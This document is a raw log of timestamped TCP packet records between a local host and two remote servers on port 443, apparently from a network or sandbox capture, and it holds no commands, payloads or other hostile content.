                                                                                                                                                                        Nov 21, 2024 10:39:06.232481956 CET4435006913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:06.234325886 CET50069443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:06.234355927 CET4435006913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:06.235013008 CET50069443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:06.235018969 CET4435006913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:06.235712051 CET4435006713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:06.239012957 CET4435006713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:06.239104033 CET50067443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:06.239212036 CET50067443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:06.239212036 CET50067443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:06.239233017 CET4435006713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:06.239245892 CET4435006713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:06.242294073 CET50072443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:06.242336035 CET4435007213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:06.242423058 CET50072443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:06.242551088 CET50072443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:06.242563963 CET4435007213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:06.529088020 CET4435006813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:06.529196978 CET4435006813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:06.529278994 CET50068443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:06.530864000 CET50068443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:06.530894041 CET4435006813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:06.530910969 CET50068443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:06.530919075 CET4435006813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:06.603437901 CET50073443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:06.603477955 CET4435007313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:06.603562117 CET50073443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:06.633040905 CET50073443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:06.633059978 CET4435007313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:06.665503025 CET4435006913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:06.668962002 CET4435006913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:06.669038057 CET50069443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:06.669042110 CET4435006913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:06.669198036 CET50069443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:06.695991993 CET50069443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:06.695991993 CET50069443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:06.696028948 CET4435006913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:06.696043968 CET4435006913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:06.720099926 CET4435007013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:06.730290890 CET50070443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:06.730321884 CET4435007013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:06.734862089 CET50070443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:06.734870911 CET4435007013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:06.742510080 CET50074443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:06.742563963 CET4435007413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:06.742683887 CET50074443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:06.742908955 CET50074443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:06.742919922 CET4435007413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:07.172049046 CET4435007013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:07.175569057 CET4435007013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:07.175642014 CET50070443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:07.175703049 CET50070443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:07.175728083 CET4435007013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:07.175740957 CET50070443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:07.175748110 CET4435007013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:07.179831028 CET50075443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:07.179862022 CET4435007513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:07.179923058 CET50075443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:07.180202961 CET50075443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:07.180214882 CET4435007513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:07.372035027 CET4435007113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:07.372689009 CET50071443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:07.372704029 CET4435007113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:07.373328924 CET50071443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:07.373332977 CET4435007113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:07.916829109 CET4435007113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:07.916980028 CET4435007113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:07.917181015 CET50071443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:07.917483091 CET50071443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:07.917483091 CET50071443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:07.917504072 CET4435007113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:07.917519093 CET4435007113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:07.920443058 CET50076443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:07.920481920 CET4435007613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:07.920593977 CET50076443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:07.920734882 CET50076443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:07.920747042 CET4435007613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.114958048 CET4435007213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.115868092 CET50072443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:08.115884066 CET4435007213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.116522074 CET50072443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:08.116528988 CET4435007213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.419363976 CET4435007313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.420078993 CET50073443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:08.420090914 CET4435007313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.420505047 CET50073443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:08.420509100 CET4435007313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.540345907 CET4435007413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.540961027 CET50074443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:08.540981054 CET4435007413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.541681051 CET50074443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:08.541687012 CET4435007413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.671133041 CET4435007213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.671154976 CET4435007213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.671215057 CET50072443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:08.671233892 CET4435007213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.671657085 CET50072443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:08.671664953 CET4435007213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.671674967 CET50072443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:08.671710014 CET4435007213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.674818993 CET50077443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:08.674896002 CET4435007713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.674990892 CET50077443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:08.675195932 CET50077443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:08.675229073 CET4435007713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.862916946 CET4435007313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.863086939 CET4435007313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.863184929 CET50073443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:08.863333941 CET50073443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:08.863353014 CET4435007313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.863365889 CET50073443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:08.863373041 CET4435007313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.870053053 CET50078443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:08.870095968 CET4435007813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.870193005 CET50078443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:08.870503902 CET50078443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:08.870523930 CET4435007813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.900962114 CET4435007513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.901484013 CET50075443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:08.901510954 CET4435007513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.902131081 CET50075443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:08.902137041 CET4435007513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.987391949 CET4435007413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.987457037 CET4435007413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.987548113 CET50074443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:08.987580061 CET4435007413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.987812042 CET50074443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:08.987826109 CET4435007413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.987852097 CET50074443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:08.988224983 CET4435007413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.988308907 CET4435007413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.988362074 CET50074443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:08.990735054 CET50079443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:08.990786076 CET4435007913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:08.990871906 CET50079443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:08.991004944 CET50079443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:08.991030931 CET4435007913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:09.338485003 CET4435007513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:09.338500977 CET4435007513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:09.338567019 CET50075443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:09.338581085 CET4435007513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:09.338854074 CET50075443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:09.338870049 CET4435007513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:09.338877916 CET50075443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:09.339010954 CET4435007513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:09.339036942 CET4435007513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:09.339119911 CET50075443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:09.341808081 CET50080443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:09.341844082 CET4435008013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:09.341917038 CET50080443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:09.342087030 CET50080443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:09.342097998 CET4435008013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:09.642544031 CET4435007613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:09.643102884 CET50076443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:09.643201113 CET4435007613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:09.643825054 CET50076443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:09.643841982 CET4435007613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:10.078329086 CET4435007613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:10.078356981 CET4435007613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:10.078444958 CET50076443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:10.078470945 CET4435007613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:10.078780890 CET50076443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:10.078790903 CET4435007613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:10.078800917 CET50076443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:10.078984976 CET4435007613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:10.079024076 CET4435007613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:10.079065084 CET50076443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:10.082154989 CET50081443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:10.082190037 CET4435008113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:10.082268000 CET50081443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:10.082469940 CET50081443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:10.082482100 CET4435008113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:10.463574886 CET4435007713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:10.464137077 CET50077443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:10.464160919 CET4435007713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:10.464735985 CET50077443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:10.464742899 CET4435007713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:10.589327097 CET4435007813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:10.589860916 CET50078443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:10.589876890 CET4435007813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:10.590467930 CET50078443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:10.590471983 CET4435007813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:10.841950893 CET4435007913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:10.842700958 CET50079443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:10.842757940 CET4435007913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:10.843180895 CET50079443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:10.843194962 CET4435007913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:10.908273935 CET4435007713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:10.908294916 CET4435007713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:10.908360958 CET50077443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:10.908385038 CET4435007713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:10.908694029 CET50077443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:10.908714056 CET4435007713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:10.908724070 CET50077443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:10.908870935 CET4435007713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:10.908899069 CET4435007713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:10.908940077 CET50077443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:10.912308931 CET50082443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:10.912339926 CET4435008213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:10.912445068 CET50082443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:10.912679911 CET50082443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:10.912688017 CET4435008213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:11.026133060 CET4435007813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:11.026207924 CET4435007813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:11.026403904 CET50078443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:11.026571989 CET50078443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:11.026588917 CET4435007813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:11.026603937 CET50078443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:11.026608944 CET4435007813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:11.030349016 CET50083443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:11.030394077 CET4435008313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:11.030492067 CET50083443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:11.030723095 CET50083443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:11.030731916 CET4435008313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:11.196366072 CET4435008013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:11.196918011 CET50080443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:11.196952105 CET4435008013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:11.197730064 CET50080443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:11.197735071 CET4435008013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:11.303472996 CET4435007913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:11.303575039 CET4435007913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:11.303647041 CET50079443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:11.303884983 CET50079443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:11.303904057 CET4435007913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:11.303921938 CET50079443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:11.303930044 CET4435007913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:11.307425022 CET50084443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:11.307475090 CET4435008413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:11.307634115 CET50084443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:11.307790041 CET50084443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:11.307804108 CET4435008413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:11.650810957 CET4435008013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:11.650877953 CET4435008013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:11.650942087 CET50080443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:11.658900023 CET50080443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:11.658921003 CET4435008013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:11.658932924 CET50080443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:11.658937931 CET4435008013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:11.663337946 CET50085443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:11.663371086 CET4435008513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:11.663472891 CET50085443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:11.663641930 CET50085443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:11.663652897 CET4435008513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:11.862451077 CET4435008113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:11.863071918 CET50081443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:11.863109112 CET4435008113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:11.863693953 CET50081443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:11.863699913 CET4435008113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:12.146852970 CET44350060172.217.16.196192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:12.147011042 CET44350060172.217.16.196192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:12.147078037 CET50060443192.168.2.6172.217.16.196
                                                                                                                                                                        Nov 21, 2024 10:39:12.305851936 CET4435008113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:12.308928013 CET4435008113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:12.309005022 CET50081443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:12.309089899 CET50081443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:12.309089899 CET50081443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:12.309137106 CET4435008113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:12.309170008 CET4435008113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:12.311805010 CET50086443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:12.311887980 CET4435008613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:12.311990023 CET50086443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:12.312110901 CET50086443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:12.312128067 CET4435008613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:12.705647945 CET4435008213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:12.706258059 CET50082443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:12.706271887 CET4435008213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:12.706737995 CET50082443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:12.706743002 CET4435008213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:12.880273104 CET4435008313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:12.880731106 CET50083443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:12.880790949 CET4435008313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:12.881149054 CET50083443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:12.881161928 CET4435008313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.159948111 CET4435008413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.160523891 CET50084443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.160562992 CET4435008413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.161309958 CET50084443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.161329985 CET4435008413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.178683043 CET4435008213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.178704977 CET4435008213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.178772926 CET50082443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.178786039 CET4435008213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.178831100 CET50082443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.179053068 CET50082443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.179056883 CET4435008213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.179076910 CET50082443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.179238081 CET4435008213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.179282904 CET4435008213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.179331064 CET50082443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.182382107 CET50087443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.182425022 CET4435008713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.182511091 CET50087443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.182746887 CET50087443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:39:13.182759047 CET4435008713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:39:13.314737082 CET50060443192.168.2.6172.217.16.196
                                                                                                                                                                        Nov 21, 2024 10:39:13.314771891 CET44350060172.217.16.196192.168.2.6
